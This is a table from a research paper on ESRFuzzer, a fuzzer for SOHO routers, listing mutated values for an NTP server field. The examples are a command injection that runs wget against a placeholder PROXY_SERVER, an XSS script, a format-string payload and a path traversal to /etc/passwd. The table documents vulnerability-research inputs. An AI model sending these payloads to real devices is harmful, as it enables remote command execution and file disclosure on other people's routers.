Skip to main content

Table 1 Example of Mutation Rules for Variable Strings

From: ESRFuzzer: an enhanced fuzzing framework for physical SOHO router devices to discover multi-Type vulnerabilities

Section Mutation Rule Example of Mutated Value
ntpserver1 Overflow time.test1.comtime.test1.com... (repeat 20 times)
  NULL-pointer dereference (empty value)
  Command Injection time.test1.com";wget http://PROXY_SERVER/ntpserver1;
  Cross-site scripting time.test1.com"; <script>alert(’xss_ntpserver1’) </script >
  Format String time.test1.com%s%s%s%s%s%s%s%s%s%s
URL http://DEVICE_IP/apply.cgi?/NTP_debug.htm/../../etc/passwd